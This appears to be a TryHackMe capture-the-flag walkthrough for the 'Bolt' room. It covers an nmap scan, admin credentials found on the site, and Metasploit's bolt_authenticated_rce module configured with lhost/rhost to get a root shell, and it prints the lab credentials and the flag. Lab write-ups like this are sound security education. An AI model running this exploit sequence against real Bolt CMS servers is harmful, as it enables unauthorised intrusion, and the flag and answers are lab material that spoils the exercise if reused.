BOLT - A hero is unleashed [THM] Walkthrough.

Hello,

Ok, so here is my Walkthrough on the room of TryHackMe known as Bolt.

It is a CMS based machine having Remote Code Execution and its beginner-friendly box. Come let's Do This Together.

#1

First things first, find your machine in Tryhackme named Bolt - A hero unleashed.

#2

Connect to your Tryhackme VPN server using your configuration file (<username>.ovpn) and here is the reference command in case you need it.

	root@root:#openvpn <username>.ovpn

#3

Also, deploy your machine from task 1 on the room and get the IP address.

#4

Information gathering:

Take this <ip> to do some Nmap scan to find what ports are open there.

	root@root:#nmap -A  <ip>

OK, so three ports are open :

22-SSH(OpenSSH)   |   80 (HTTP-Apache)    |   8000 (HTTP-PHP 7.2.32-1)

#5

As port 80 is there so I tried to open it into web browser <ip>:80

Ahhh.. nothing interesting just default page of Ubuntu Apache 2 server

Then as port 8000 is also having HTTP service so I tried port 8000 <ip>:8000

And got this Bolt CMS page.

Ahha! a blue screen but not of Death(BOD) instead of a hit.

#6

OK, its time to wander around the site (Do it yourself).

Now during wandering, u will come across these two pages.

One have I note by the admin itself saying that here is the password in case if you need help and they forgot to remove it before production.

The second page contains the username for that. How lucky I am.

#7

Meanwhile we got the two answers as well.

These two shows the user name and password.

#8

We now have the Answer to the question, but where is the Question (login_page)?

so to find the question to my answers (sarcastic),

we need to google about the location of the default login page in bolt CMS. and I end up with this documentation manual on their official site.

According to the documentation, we'll get login page at www.yourdomain.com/bolt/login

so put in into our room address URL: <ip>:8000/bolt/login and get this login page.

#9

Now more Information gathering:

OK, admin dashboard, lovely!

Wait! what's that in the bottom left corner. Hello Little version of Bolt CMS. (Bolt 3.7.1)

#10

Now we need to exploit this. to do so we need an exploit, so search it on google database, or any other database for Bolt CMS 3.7.1 and we will get this exploit for the older version 3.7.0.

Here we go with the next answer to the task. Here is the exploit we are going to use. since it looks promising by name

#11

Attacking:

Not lets fire our Metasploit its time to Attack:

search "bolt" to find the exploit

msf# <second exploit> is what we are going to use

use<path>

	msf6> use exploit/unix/webapp/bolt_authenticated_rce

now check the options by

msf(unix/webapp/bolt_authenticated_rce)>show options

Now set a few attributes of our exploit

>set lhost= <yourip>
	//use ifconfig command in Linux and type tun0 <yourip>.
>set rhost= <room ip>
>set username= bolt
>set password= boltadmin123
>run

#12

Wallah! we Got the shell

id

Booyah! we have root excess & now we need to crawl into the system to get the flag.

pwd

we are in-home/bolt/public/files | move to home

cd /home

list the files, here is a file of the flag

ls

don't wait just cat it

because bolt hates cat😹.

cat flag.txt

THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}

And here you go, you have exploited the machine, got a flag and ...

BOLT- A hero back in leash

#bolt #tryhackme #walkthrough #writeups